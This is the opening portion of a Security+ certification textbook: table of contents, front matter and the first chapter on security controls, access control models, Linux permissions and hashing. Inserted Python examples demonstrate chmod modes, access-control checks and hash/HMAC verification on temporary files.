Table of Contents

Table of Contents 2

Ian Neil 13

CompTIA Security+ Certification Guide 15

Why subscribe? 17

Packt.com 18

Contributor 19

About the author 20

Packt is searching for authors like you 21

Table of Contents 22

Preface 31

Who this book is for 32

What this book covers 33

To get the most out of this book 34

Download the color images 35

Conventions used 36

Get in touch 37

Reviews 38

Understanding Security Fundamentals 39

CIA triad concept 40

Identifying security controls 41

Administrative controls 42

Technical controls 43

Physical controls 44

Preventative controls 47

Deterrent controls 48

Detective controls 49

Corrective controls 50

Compensating controls 51

Access controls 52

Discretionary access control 53

Least privilege 55

Mandatory access control 56

Linux permissions (not SELinux) 57

Role-based access control 59

Rule-based access control 60

Attribute-based access control 61

Group-based access 62

Hashing and data integrity 63

Hash practical 65

Hash exercise 66

Defense in depth model 69

Review questions 70

Answers and explanations 72

Conducting Risk Analysis 75

Risk management 76

Importance of policy, plans, and procedures 77

Standard operating procedures 78

Agreement types 79

Personnel management—policies and procedures 81

Role-based awareness training 84

General security policies 85

Business impact analysis concepts 86

Privacy threshold assessment/privacy impact assessment 87

Mission-essential functions/identification of critical systems 88

Example 89

Supply chain risk assessment 90

Example 91

Business impact analysis concepts 92

Calculating loss 93

Example 94

Risk procedures and concepts 95

Threat assessment 96

Threat actors 97

Risk treatment 98

Risk register 100

Qualitative/quantitative risk analysis 101

Review questions 102

Answers and explanations 103

Implementing Security Policies and Procedures 106

Industry standard frameworks and reference architecture 107

OSI reference model 108

TCP/IP model 110

Types of frameworks 111

Benchmarks/secure configuration guides 113

Policies and user guides 114

Security configuration guides – web servers 116

Network infrastructure device user guides 117

General purpose guides 118

Implementing data security and privacy practices 120

Destroying data and sanitizing media 121

Data sensitivity labeling and handling 123

Data retention – legal and compliance 124

Data roles 125

Practical – creating a baseline 126

Review questions 131

Answers and explanations 133

Delving into Identity and Access Management 136

Understanding identity and access management concepts 137

Passwords 138

Default/administrator password 139

Passwords—group policy 140

Password recovery 142

Authentication factors 143

Number of factor examples 145

Transitive trust 146

Federation services 147

Shibboleth 150

Single sign-on 151

Installing and configuring identity and access services 152

LDAP 153

Kerberos 155

Internet-based open source authentication 157

Authentication, authorization, and accounting (AAA) servers 158

Authentication 159

Learning about Identity and access management controls 161

Biometrics 162

Security tokens and devices 165

Certification-based authentication 166

Port-based authentication 167

Common account management practices 168

Account types 169

Account creation 172

Employees moving departments 173

Disabling an account 174

Account recertification 175

Account maintenance 176

Account monitoring 177

Security Information and Event Management 178

Group based access control 181

Credential management 182

User account reviews 183

Practical exercise – password policy 184

Review questions 185

Answers and explanations 188

Understanding Network Components 192

OSI – reference model 194

Installing and configuring network components 196

Firewall 197

Router 200

Access control list – network devices 201

Intrusion-prevention system 202

Intrusion-detection system 203

Modes of detection 204

Modes of operation 205

Monitoring data 206

Switch 207

Layer 3 switch 209

Proxy server 210

Reverse proxy 212

Remote access 213

Virtual private network using L2TP/IPSec 214

IPSec 216

IPSec – handshake 217

VPN concentrator 218

Site-to-site VPN 219

VPN always on versus on-demand 220

SSL VPN 221

Split tunnelling 222

Load balancer 223

Clustering 225

Data-loss prevention 226

Security information and event management 227

Mail gateway 228

Cloud-based email 229

Media gateway 230

Hardware security module 231

Software-defined network 232

Secure network architecture concepts 233

Network address translation 235

Port address translation 236

Network access control (NAC) 237

Honeypot 239

Secure Socket Layer accelerators 240

SSL/TLS decryptor 241

Sensor/collector 242

Tap/port mirror 243

DDoS mitigator 244

Segregation/segmentation/isolation 245

Security device/technology placement 247

DMZ device placement 248

LAN device placement 249

Aggregation switches 250

Implementing secure protocols 251

Use case 255

File transfer – use case 256

Remote access – use case 257

Email – use case 258

Name resolution – use case 259

Hostname 260

DNSSEC 262

NETBIOS 263

Web – use case 264

Voice and video – use case 265

Network address allocation – use case 266

IP version 4 267

IP version 4 – lease process 269

IP version 4 lease process – troubleshooting 270

IP version 6 addressing 272

Subscription services – use case 273

Routing – use case 274

Time synchronization – use case 276

Directory services – use case 277

Active Directory 278

Switching – use case 280

Simple network management protocol – use case 281

Implementing wireless security 282

Wireless access points – controllers 283

Securing access to your wireless access point 284

Wireless bandwidth/band selection 286

Wireless channels 287

Wireless antenna types and signal strength 288

Wireless coverage 289

Wireless encryption 290

Wireless – open system authentication 291

Wireless – WPS 292

Wireless – captive portal 293

Wireless attacks 294

Wireless authentication protocols 295

Review questions 296

Answers and explanations 300

Understanding Cloud Models and Virtualization 305

Cloud computing 306

Implementing different cloud deployment models 309

Cloud service models 312

Disk resiliency and redundancy 317

Redundant array of independent disks 318

Storage area network 321

Understanding cloud storage concepts 323

Exploring virtual networks 324

Virtual desktop infrastructure 329

VDE 330

Heating, ventilation, and air-conditioning 331

Network environments 332

On-premises 333

Hosted services 334

Cloud-hosting services 335

Practical exercise – is the cloud cost-effective? 336

Review questions 337

Answers and explanations 339

Managing Hosts and Applications Deployment 341

Deploying mobile devices securely 343

Bring your own device 344

Choose your own device 346

Corporate-owned personally-enabled 347

Virtual desktop infrastructure 348

Mobile device connection methods 349

Mobile device management concepts 352

Accessing the device 353

Device management 354

Device protection 355

Device data 356

Mobile device enforcement and monitoring 357

Industrial control system 360

Supervisory control and data acquisition 361

Mobile devices – security implications of embedded systems 362

Special-purpose devices 365

Secure application development and deployment concepts 367

Development life cycle models – waterfall vs agile 369

Waterfall 370

Agile 371

Agile versus waterfall 372

DevOps 373

Secure DevOps 374

Secure coding techniques 375

Code quality and testing 378

Server-side versus client-side execution and validation 380

Review questions 381

Answers and explanations 384

Protecting Against Attacks and Vulnerabilities 388

Virus and malware attacks 390

Social engineering attacks 393

Common attacks 397

Application/service attacks 398

Programming attacks 404

Example 1—JavaScript—creating a money variable 406

Example 2—JavaScript—setting the day of the month 407

Hijacking related attacks 410

Driver manipulation 412

Cryptographic attacks 413

Password attacks 414

Wireless attacks 416

Penetration testing 419

Penetration testing techniques 420

Vulnerability scanning concepts 421

Credentialed versus non-credentialed scans 423

Penetration testing versus vulnerability scanning 424

Practical exercise—running a vulnerability scanner 425

Review questions 431

Answers and explanations 434

Implementing Public Key Infrastructure 438

Public key infrastructure concepts 440

Certificate hierarchy 441

Certificate trust 445

Certificate validity 446

Certificate management concepts 447

Certificate types 449

Asymmetric and symmetric encryption 451

Encryption explained 452

Digital signature explained 456

Cryptography algorithms and their characteristics 458

Symmetric algorithms 459

Asymmetric algorithms 460

Symmetric versus asymmetric analogy 462

XOR encryption 463

Key stretching algorithms 464

Cipher modes 465

Stream versus block cipher analogy 466

Hashing and data integrity 468

Comparing and contrasting basic concepts of cryptography 469

Asymmetric – PKI 470

Asymmetric – weak/deprecated algorithms 471

Asymmetric – ephemeral keys 472

Symmetric algorithm – modes of operation 473

Symmetric encryption – stream versus block cipher 474

Symmetric encryption – confusion 475

Symmetric encryption – secret algorithm 476

Symmetric – session keys 477

Hashing algorithms 478

Crypto service provider 479

Crypto module 480

Protecting data 481

Basic cryptographic terminology 482

Obfuscation 483

Pseudo random number generator 484

Nonce 485

Perfect forward secrecy 486

Security through obscurity 487

Collision 488

Steganography 489

Diffusion 490

Implementation versus algorithm 491

Common use cases for cryptography 492

Supporting confidentiality 493

Supporting integrity 494

Supporting non-repudiation 495

Supporting obfuscation 496

Low-power devices 497

Low latency 498

High resiliency 499

Supporting authentication 500

Resource versus security constraints 501

Practical exercises 502

Practical exercise 1 – building a certificate server 503

Practical exercise 2—encrypting data with EFS and stealing certificates 504

Practical exercise 3 – revoking the EFS certificate 505

Review questions 506

Answers and explanations 509

Responding to Security Incidents 513

Incident response procedures 514

Incident response process 516

Understanding the basic concepts of forensics 518

Five minute practical 520

Software tools to assess the security posture of an organization 524

Backup utilities 529

Backup types 530

Command-line tools 532

Analyzing and interpreting output from security technologies 539

Review questions 545

Answers and explanations 548

Managing Business Continuity 551

Implementing secure systems design 553

Hardware/firmware security 554

Operating systems 556

Securing IT systems 557

Peripherals 558

Importance of secure staging deployment concepts 559

Troubleshooting common security issues 561

Misconfigured devices 564

Personnel issues 565

Software issues 567

Disaster recovery and continuity of operations concepts 568

Review questions 571

Answers and explanations 573

Mock Exam 1 575

Mock Exam 2 586

Preparing for the CompTIA Security+ 501 Exam 599

Tips on taking the exam 600

Exam preparation 601

Practical 1—drag and drop—attacks 603

Practical 2—drag and drop—certificates 605

Practical 3—drag and drop—ports/protocol 607

Practical 4—drag and drop—authentication factors 609

Practical 5—drag and drop—general 610

Drag and drop—answers 612

Linux information 617

Acronyms 618

Assessment 625

Mock Exam 1 626

Mock Exam 2 645

Other Books You May Enjoy 667

Leave a review - let other readers know what you think 669

CompTIA Security+ Certification Guide

Master IT security essentials and exam topics for CompTIA Security+ SY0-501 certification

Ian Neil

BIRMINGHAM - MUMBAI

CompTIA Security+ Certification Guide

Copyright © 2018 Packt Publishing

All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews.

Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the author, nor Packt Publishing or its dealers and distributors, will be held liable for any damages caused or alleged to have been caused directly or indirectly by this book.

Packt Publishing has endeavored to provide trademark information about all of the companies and products mentioned in this book by the appropriate use of capitals. However, Packt Publishing cannot guarantee the accuracy of this information.

Commissioning Editor: Gebin George
Acquisition Editor: Rahul Nair
Content Development Editor: Arjun Joshi
Technical Editor: Varsha Shivhare
Copy Editor: Safis Editing
Project Coordinator: Kinjal Bari
Proofreader: Safis Editing
Indexer: Tejal Daruwale Soni
Graphics: Jisha Chirayil
Production Coordinator: Shraddha Falebhai

First published: September 2018

Production reference: 1290918

Published by Packt Publishing Ltd.
Livery Place
35 Livery Street
Birmingham
B3 2PB, UK.

ISBN 978-1-78934-801-9

www.packtpub.com



mapt.io

Mapt is an online digital library that gives you full access to over 5,000 books and videos, as well as industry leading tools to help you plan your personal development and advance your career. For more information, please visit our website.

Why subscribe?

Packt.com

Did you know that Packt offers eBook versions of every book published, with PDF and ePub files available? You can upgrade to the eBook version at www.packt.com and as a print book customer, you are entitled to a discount on the eBook copy. Get in touch with us at customercare@packtpub.com for more details.

At www.packt.com, you can also read a collection of free technical articles, sign up for a range of free newsletters, and receive exclusive discounts and offers on Packt books and eBooks. 

Contributor

About the author



Ian Neil is one of the world's top trainers of Security+ 501, with the ability to break the information down into manageable chunks so that people with no background knowledge can follow it. Ian was a finalist of the Learning and Performance Institute Trainer of the Year Awards. He has worked for the US Army in Europe and designed a Security+ course that catered to people from all backgrounds, not just IT professionals, with an extremely successful pass rate.

He was instrumental in helping Microsoft get their office in Bucharest off the ground, where he won a recognition award for being one of their top trainers. Ian is an MCT, MCSE, A+, Network+, Security+, CASP, and RESILIA practitioner who over the past 20 years has worked with high-end training providers.



Packt is searching for authors like you

If you're interested in becoming an author for Packt, please visit authors.packtpub.com and apply today. We have worked with thousands of developers and tech professionals, just like you, to help them share their insight with the global tech community. You can make a general application, apply for a specific hot topic that we are recruiting an author for, or submit your own idea.


Preface

This book will help you to understand security fundamentals, ranging from the CIA triad right through to identity and access management. This book describes network infrastructure and how it is evolving with the implementation of virtualization and different cloud models and their storage. You will learn how to secure devices and applications that are used by a company. 

Refer to www.ianneil501.com for additional exam resources.

Who this book is for

This book is designed for anyone who is seeking to pass the CompTIA Security+ SY0-501 exam. It is a stepping stone for anyone who wants to become a security professional or move into cyber security.

What this book covers

Chapter 1, Understanding Security Fundamentals, covers some security fundamentals that will be expanded upon in later chapters.

Chapter 2, Conducting Risk Analysis, looks at the types of threats and vulnerabilities, and at the roles that different threat actors play.

Chapter 3, Implementing Security Policies and Procedures, looks at reference architectures, different guides, and how best to dispose of data.

Chapter 4, Delving into Identity and Access Management, looks at different types of authentication and how to dispose of data. We will first look at the concepts of identity and access management.

Chapter 5, Understanding Network Components, examines networking components and how they could affect the security of your network. We will look at firewalls, switches, and routers.

Chapter 6, Understanding Cloud Models and Virtualization, teaches about virtualization, deployment, and security issues. We will get acquainted with various cloud models, looking at their deployment and storage environments.

Chapter 7, Managing Hosts and Applications Deployment, looks at different mobile devices and their characteristics, as well as the applications that run on these devices.

Chapter 8, Protecting Against Attacks and Vulnerabilities, explores attacks and vulnerabilities, taking in turn each type of attack and its unique characteristics. This module is probably the most heavily tested module in the Security+ exam.

Chapter 9, Implementing Public Key Infrastructure, gets into the different encryption types and how certificates are issued and used.

Chapter 10, Responding to Security Incidents, deals with incident response, focusing on the collection of volatile evidence for forensic analysis.

Chapter 11, Managing Business Continuity, turns its attention toward our business environment to consider the provision of systems availability, looking at selecting the most appropriate method for recovery following a disaster.

Chapter 12, Mock Exam 1, includes mock questions, along with explanations, which will help in assessing whether you're ready for the test.

Chapter 13, Mock Exam 2, includes more mock questions, along with explanations, which will help in assessing whether you're ready for the test.

Appendix A, Preparing for the CompTIA Security+ 501 Exam, is included to help students pass the Security+ exam first time.

Appendix B, Acronyms, contains full forms of the abbreviations used in all the chapters. 

To get the most out of this book

This certification guide assumes no prior knowledge of the product. 

Download the color images

We also provide a PDF file that has color images of the screenshots/diagrams used in this book. You can download it here: http://www.packtpub.com/sites/default/files/downloads/9781789348019_ColorImages.pdf.

Conventions used

There are a number of text conventions used throughout this book.

CodeInText: Indicates code words in text, database table names, folder names, filenames, file extensions, pathnames, dummy URLs, user input, and Twitter handles. Here is an example: "For example, if we take the word pass in plaintext it may then be converted to UDVV; this way it is difficult to understand."

Bold: Indicates a new term, an important word, or words that you see onscreen. For example, words in menus or dialog boxes appear in the text like this. Here is an example: "The most common asymmetric algorithms include the Diffie Hellman, which creates a secure session so that symmetric data can flow securely. "

Warnings or important notes appear like this.

Tips and tricks appear like this.

Get in touch

Feedback from our readers is always welcome.

General feedback: If you have questions about any aspect of this book, mention the book title in the subject of your message and email us at customercare@packtpub.com.

Errata: Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you have found a mistake in this book, we would be grateful if you would report this to us. Please visit www.packt.com/submit-errata, selecting your book, clicking on the Errata Submission Form link, and entering the details.

Piracy: If you come across any illegal copies of our works in any form on the Internet, we would be grateful if you would provide us with the location address or website name. Please contact us at copyright@packt.com with a link to the material.

If you are interested in becoming an author: If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, please visit authors.packtpub.com.



Reviews

Please leave a review. Once you have read and used this book, why not leave a review on the site that you purchased it from? Potential readers can then see and use your unbiased opinion to make purchase decisions, we at Packt can understand what you think about our products, and our authors can see your feedback on their book. Thank you!

For more information about Packt, please visit packt.com.

Understanding Security Fundamentals

In this chapter, we will look at a number of security fundamentals, some of which will be expanded upon in later chapters. For the exam, you will need to know all of the information in this book, as the exam is fairly tricky.

We will cover the following exam objectives in this chapter:

CIA triad concept

Most security books start with the basics of security by featuring the CIA triad—this is a model designed to guide policies for information security within an organization. It is a widely used security model, and it stands for confidentiality, integrity, and availability: the three key principles that should be used to guarantee a secure system.


Figure 1: CIA triad

Identifying security controls

There are a wide variety of security controls that are used to mitigate the risk of being attacked; the three main categories of security control are technical, administrative, and physical. In this section, we are going to look at these in more detail; you need to be familiar with each of these controls and know when each of them should be applied. Let's start by looking at the three main categories.

Administrative controls

Administrative controls are mainly written by managers as organizational policies to reduce risk within the company. An example is an internet-use policy, so that employees understand that the internet may only be used for company business and not for social media during the working day. Another administrative control is completing a form, for example to apply for leave; the form would be available from the forms library:

Administrative controls could be writing a policy, completing a form, and getting your ID badge re-keyed annually.

Technical controls

Technical controls are those implemented by the IT team to reduce risk to the business. These could include the following:

Technical controls could be installing a screensaver or configuring firewall rules.

Physical controls

Physical controls are controls that you can physically touch, for example:

HVAC systems help provide availability to servers in the data center, ensuring they don't overheat.

Preventative controls

Preventative controls are in place to stop an attack before it succeeds; this could be a security guard with a large dog patrolling the perimeter of your company, which keeps intruders out and makes anyone thinking of breaking in think twice:

Deterrent controls

Deterrent controls discourage an attacker from trying. Examples are CCTV and motion sensors: when someone walking past a building triggers the motion sensors, lights come on to deter them.

A building with a sign saying that it is being filmed by CCTV deters someone from breaking into your premises, as they believe they are being filmed, even though there may not be a camera inside. They do not know that.

CCTV and motion sensors act as deterrents. CCTV is also a form of detective control following an incident, when you review the footage to see how the incident happened.

Detective controls

Detective controls are used to discover that an incident has happened and to investigate it; these could include the following:

Corrective controls

Corrective controls are the actions you take to recover from an incident. You may lose a hard drive that contained data; in that case, you would replace the data from a backup you had previously taken.

Fire-suppression systems are another form of corrective control. If a fire in your data center destroyed many servers, then when you purchase replacements you might also install an oxygen-displacing suppression system. This method uses argon/nitrogen, sometimes with a small amount of CO2, to displace the oxygen in the server room; reducing the oxygen level to below about 15% suppresses the fire.

Compensating controls

Compensating controls can also be called alternative controls; a compensating control is a mechanism put in place to satisfy the requirements of a security measure that is deemed too difficult or impractical to implement at the present time. It is similar to going shopping with $100 in cash: once you have spent the cash, you use a credit card as a compensating control.

An example is a new employee joining a company where the normal way to log in is with a smart card and PIN. The card resembles a bank card with a chip; you insert it into your laptop or keyboard reader and then enter a PIN to log in. If it takes 3-5 days to issue a new smart card, then during the waiting period the new employee may log in using a username and password:


Access controls

The three main parts of access control are identifying an individual, authenticating them when they enter a password or PIN, and then authorization, where different individuals are granted different levels of access to different data. For example, someone working in finance will need a higher level of clearance, and access to different data, than the person who dispatches orders in finished goods:

Discretionary access control

Discretionary access control (DAC) is where the owner or creator of a resource decides who may access it and at what level; the New Technology File System (NTFS) file permissions used in Microsoft operating systems are an example. Each user is given only the access that he/she needs to perform their job.

The permissions are as follows:


Least privilege

Least privilege is where you give someone only the limited access level required for them to perform their job role; the related principle of need to know restricts access to specific data to those who require it. The company will write a least privilege policy so that administrators know how to apply it.

Mandatory access control

Mandatory Access Control (MAC) is based on the classification level of the data, which reflects how much damage its disclosure could cause, for example to the interests of the nation. The classification levels are as follows:

Examples of Mandatory Access Control (MAC):

Data type                  Classification
Nuclear energy project     Top secret
Research and development   Secret
Ongoing legal issues       Confidential
Government payroll         Restricted

Linux permissions (not SELinux)

File permissions: Linux permissions are written as three octal digits; the first digit represents the owner, the second digit represents the group, and the third digit represents all other users. Each digit is the sum of read (4), write (2), and execute (1):

On a file, the execute (x) permission lets you run it, as it does in Windows. On a directory, execute lets you enter it and look up (search) entries by name, while read lets you list its contents.

A permission of 6 (4 + 2) is read and write. A value of 2 is write only, and a value of 7 (4 + 2 + 1) is read, write, and execute. Some examples are as follows:

When selecting the highest permission, treat the three digits as a number and compare the leftmost digit first; the highest value, 777, is full control.

When selecting the lowest, look for the lowest leftmost digit. In the examples, two options, d and e, start with the lowest digit, so you then compare the remaining digits. From these, you can see that answer e is the lowest.

The higher the number, the more permissions are granted; the lowest number grants the fewest permissions.

You can also change permissions in Linux with the chmod command. If the permission on File C is 654 and we wish to change it, we run chmod 777 fileC, which changes the permissions on File C to 777.
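As an added example that is not from the book, the same numeric-to-rwx translation done in Python, together with chmod applied to a throwaway file and directory and read back from the kernel with stat.filemode, so you can see exactly what each octal mode means. The file names and contents are constructed for the example.

```python
import os
import stat
import tempfile
from pathlib import Path

# Each octal digit is the sum of the bits it grants: read 4, write 2, execute 1.
BITS = ((4, "r"), (2, "w"), (1, "x"))


def digit_to_rwx(digit: int) -> str:
    """Turn one octal digit (0-7) into its rwx triplet, e.g. 6 -> 'rw-'."""
    if not 0 <= digit <= 7:
        raise ValueError(f"permission digit must be 0-7, got {digit}")
    return "".join(letter if digit & bit else "-" for bit, letter in BITS)


def mode_to_rwx(mode: str) -> str:
    """'754' -> 'rwxr-xr--': first digit owner, second group, third everyone else."""
    if len(mode) != 3 or not mode.isdigit():
        raise ValueError(f"expected three octal digits, got {mode!r}")
    return "".join(digit_to_rwx(int(d)) for d in mode)


def rwx_to_mode(rwx: str) -> str:
    """The reverse: 'rw-r-----' -> '640', as you would read it off ls -l."""
    if len(rwx) != 9:
        raise ValueError(f"expected nine permission characters, got {rwx!r}")
    digits = []
    for i in range(0, 9, 3):
        triplet = rwx[i:i + 3]
        digits.append(str(sum(bit for (bit, letter), ch in zip(BITS, triplet) if ch == letter)))
    return "".join(digits)


def apply_and_read_back(path, mode: str) -> str:
    """chmod the path with an octal mode and return what the kernel reports, in the
    same form as the first column of ls -l (type character plus nine permission bits)."""
    os.chmod(path, int(mode, 8))
    return stat.filemode(os.stat(path).st_mode)


def demo() -> dict:
    """Recreate the chapter's File C (constructed content) and change its permissions.
    The directory case shows the execute bit on directories: with 644 you can list
    the directory but cannot enter it or open files inside it by name."""
    with tempfile.TemporaryDirectory() as tmp:
        docs = Path(tmp) / "docs"
        docs.mkdir()
        file_c = docs / "fileC"
        file_c.write_text("constructed sample content\n")
        results = {
            "fileC 654": apply_and_read_back(file_c, "654"),
            "fileC 777": apply_and_read_back(file_c, "777"),
            "docs 750": apply_and_read_back(docs, "750"),
            "docs 644 (listable, not searchable)": apply_and_read_back(docs, "644"),
        }
        os.chmod(docs, 0o700)  # restore so the temporary directory can be cleaned up
    return results


if __name__ == "__main__":
    for label, shown in demo().items():
        print(f"{label:38} {shown}")
```

Run it as a normal user: the read-back strings are what ls -l would show, and the "docs 644" row is the case the text describes, where a directory without the execute bit can be listed but not searched.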


Role-based access control

Role-based access control restricts access to a subset of duties within a department. An example would be two people within the finance department who are the only ones allowed to handle the petty cash. In IT terms, it could be that only two members of the IT team administer the email server.

Rule-based access control

In Rule-Based Access Control (also abbreviated RBAC, so read exam questions carefully), a rule is applied to everyone it covers; for example, contractors will only have access between 8 a.m. and 5 p.m., and help desk staff will only be able to access Building 1, where they work. The rule can be time-based or apply some other restriction, but it applies to the whole group or department rather than to an individual.

Attribute-based access control

In Attribute-Based Access Control (ABAC), access is restricted based on an attribute in the account. John could be an executive and some data could be restricted to only those with the executive attribute.

Group-based access

To control access to data, users are put into groups to simplify administration. An example would be two people who work in Information Technology (IT), Bill and Ben, who both need access to the older IT data:


Using group-based access, everyone in the sales team may have full control of the sales data, but two new starters may need only read access. In that case, you would create a group called New Starters and give that group read permission only on the data.


If access to data is done via group-based access, then any solution in the exam will be a group-based answer.
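An added example, not from the book, that puts the models of this section side by side as small decision functions: DAC with cumulative user and group permissions (as NTFS does it), MAC comparing clearance with classification, role, rule (time window and location), and ABAC. The subjects, groups, resources and the level ordering are constructed to mirror the chapter's examples (Bill and the old IT data, the read-only new starters, the executive attribute, the contractors' hours); the group is called new-starters and the role email-admin purely by assumption.

```python
from dataclasses import dataclass
from datetime import time

# Classification levels, lowest to highest, used by the MAC check.
LEVELS = {"unclassified": 0, "restricted": 1, "confidential": 2, "secret": 3, "top secret": 4}


@dataclass(frozen=True)
class Subject:
    name: str
    clearance: str = "unclassified"
    roles: frozenset = frozenset()
    groups: frozenset = frozenset()
    attributes: tuple = ()          # (key, value) pairs, e.g. (("executive", True),)


@dataclass(frozen=True)
class Resource:
    name: str
    owner: str
    classification: str = "unclassified"
    acl: tuple = ()                 # (principal, permission) pairs granted by the owner


def effective_permissions(subject, resource):
    """DAC/group-based: the owner has everything; everyone else gets the union of what
    the ACL grants to their user name or to any group they belong to (cumulative)."""
    if subject.name == resource.owner:
        return {"read", "write", "execute"}
    principals = {subject.name} | set(subject.groups)
    return {perm for principal, perm in resource.acl if principal in principals}


def dac_allows(subject, resource, permission):
    return permission in effective_permissions(subject, resource)


def mac_allows_read(subject, resource):
    """MAC: the system compares labels; a subject reads only data at or below its clearance."""
    return LEVELS[subject.clearance] >= LEVELS[resource.classification]


def role_allows(subject, required_role):
    """Role-based: only members of the narrow role (e.g. the two email admins) may act."""
    return required_role in subject.roles


def rule_allows(now, start, end, location=None, allowed_location=None):
    """Rule-based: a time window and/or location restriction applied to everyone it covers."""
    in_hours = start <= now <= end
    in_place = allowed_location is None or location == allowed_location
    return in_hours and in_place


def abac_allows(subject, **required):
    """ABAC: every required attribute must be present on the subject with the right value."""
    attrs = dict(subject.attributes)
    return all(attrs.get(k) == v for k, v in required.items())


def scenarios():
    """Constructed subjects and resources mirroring the chapter's examples."""
    bill = Subject("bill", clearance="restricted", groups=frozenset({"old-it-data"}))
    sam = Subject("sam", clearance="restricted", groups=frozenset({"sales"}))
    nina = Subject("nina", clearance="restricted", groups=frozenset({"new-starters"}))
    john = Subject("john", clearance="secret", roles=frozenset({"email-admin"}),
                   attributes=(("executive", True),))
    carl = Subject("carl", attributes=(("executive", False),))

    archive = Resource("old IT data", owner="it-manager", classification="restricted",
                       acl=(("old-it-data", "read"), ("old-it-data", "write")))
    sales = Resource("sales data", owner="sales-director", classification="restricted",
                     acl=(("sales", "read"), ("sales", "write"), ("sales", "execute"),
                          ("new-starters", "read")))
    payroll = Resource("government payroll", owner="hr", classification="restricted")
    nuclear = Resource("nuclear energy project", owner="ministry", classification="top secret")

    return {
        "group: bill reads old IT data": dac_allows(bill, archive, "read"),
        "group: carl reads old IT data": dac_allows(carl, archive, "read"),
        "group: sam has full control of sales data": effective_permissions(sam, sales) == {"read", "write", "execute"},
        "group: new starter nina is read-only": effective_permissions(nina, sales) == {"read"},
        "dac: owner always has access": dac_allows(Subject("sales-director"), sales, "write"),
        "mac: secret clearance reads restricted payroll": mac_allows_read(john, payroll),
        "mac: secret clearance reads top secret project": mac_allows_read(john, nuclear),
        "role: john administers email": role_allows(john, "email-admin"),
        "role: bill administers email": role_allows(bill, "email-admin"),
        "rule: contractor at 16:30 in building 1": rule_allows(time(16, 30), time(8), time(17), "building 1", "building 1"),
        "rule: contractor at 18:00": rule_allows(time(18), time(8), time(17)),
        "rule: help desk in building 2": rule_allows(time(10), time(8), time(17), "building 2", "building 1"),
        "abac: executive john": abac_allows(john, executive=True),
        "abac: contractor carl": abac_allows(carl, executive=True),
    }


if __name__ == "__main__":
    for name, allowed in scenarios().items():
        print(f"{'ALLOW' if allowed else 'DENY ':5} {name}")
```

The point of keeping the checks separate is that real systems stack them: a file server applies the DAC ACL, the operating system label check (MAC) sits underneath it, and a time-of-day rule on the login in front of both; a request must pass every layer that applies to it.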

Hashing and data integrity

Can you read data that has been hashed? Yes: hashing does not hide the data. A digitally signed email can still be read by anyone who intercepts it; the hash only lets the recipient verify its integrity. If you wish to stop someone reading the email in transit, you need to encrypt it.

Hash practical

The reason that we hash a file is to verify its integrity so that we know if someone has tampered with it.

Hash exercise

In this exercise, we have a file called data.txt. First of all, I use a free MD5 hashing tool and browse to the data.txt file, which generates a hash value. I have also created a folder called Move data to here:

  1. Get the original hash:


  2. Copy the hash from the current hash value to the original hash value.

  3. Copy the data.txt file to the Move data to here folder, then go to the MD5 hash software and browse to the data.txt file in the new location, then press verify. The values should be the same, as shown here:


The values are the same, therefore we know the integrity of the data is intact and it has not been tampered with while moving the data.txt file.

  4. Next, we go into the data.txt file and change a single character, add an extra dot at the end of a sentence, or even enter a space that cannot be seen. We then take another hash of the data and will see that the hash value is different and does not match; this means that the data has been tampered with:
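The same exercise carried out in code, as an added example that is not from the book: hash data.txt, copy it, verify, then change one invisible character. It also shows the caveat a practitioner needs: a plain hash published alongside a file can simply be recomputed by whoever tampered with the file, so integrity against an active attacker needs a keyed HMAC (the review questions below ask what HMAC provides). SHA-256 is used instead of the MD5 tool in the screenshots because MD5 and SHA-1 are no longer collision resistant; the file content and the shared key are constructed for the example.

```python
import hashlib
import hmac
import shutil
import tempfile
from pathlib import Path

CHUNK = 64 * 1024


def digest_of_bytes(data: bytes, algorithm: str = "sha256") -> str:
    """Hash in-memory data. Any conforming implementation gives the same output
    for the same input, which is why two SHA-1 tools agree on a file's hash."""
    return hashlib.new(algorithm, data).hexdigest()


def file_digest(path, algorithm: str = "sha256") -> str:
    """Hash a file in chunks so large files need not fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_digest(path, expected: str, algorithm: str = "sha256") -> bool:
    """Constant-time comparison so the verification step itself does not leak."""
    return hmac.compare_digest(file_digest(path, algorithm), expected)


def file_hmac(path, key: bytes, algorithm: str = "sha256") -> str:
    """Keyed hash: only a holder of the key can produce a valid tag."""
    mac = hmac.new(key, digestmod=algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            mac.update(chunk)
    return mac.hexdigest()


def verify_hmac(path, key: bytes, expected: str, algorithm: str = "sha256") -> bool:
    return hmac.compare_digest(file_hmac(path, key, algorithm), expected)


def run_exercise() -> dict:
    """Steps 1-4 of the chapter's exercise, then the keyed-hash caveat."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        src = Path(tmp) / "data.txt"
        dest_dir = Path(tmp) / "Move data to here"
        dest_dir.mkdir()
        src.write_text("Quarterly figures are final.\n")  # constructed content

        original = file_digest(src)                               # step 1: original hash
        moved = Path(shutil.copy2(src, dest_dir / "data.txt"))    # step 3: copy and re-hash
        results["copy matches original"] = verify_digest(moved, original)

        # Step 4: one invisible change, a space before the newline.
        moved.write_text("Quarterly figures are final. \n")
        results["tamper detected by hash"] = not verify_digest(moved, original)

        # Caveat: whoever changed the file can publish a fresh hash for it.
        attacker_hash = file_digest(moved)
        results["recomputed hash accepts tampered file"] = verify_digest(moved, attacker_hash)

        # HMAC with a key shared out of band (assumed here) blocks that: without
        # the key the attacker cannot produce a tag that verifies.
        key = b"shared-secret-between-sender-and-receiver"
        tag = file_hmac(src, key)
        results["hmac verifies original"] = verify_hmac(src, key, tag)
        results["hmac rejects tampered file"] = not verify_hmac(moved, key, tag)
        forged = file_hmac(moved, b"guess")
        results["hmac rejects forged tag"] = not verify_hmac(moved, key, forged)
    return results


if __name__ == "__main__":
    for step, ok in run_exercise().items():
        print(f"{'PASS' if ok else 'FAIL'} {step}")
```

Every line of run_exercise should print PASS: the first three rows reproduce the book's screenshots (and the third shows why a hash alone is not proof of origin), the last three show the keyed version holding up.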


Defense in depth model

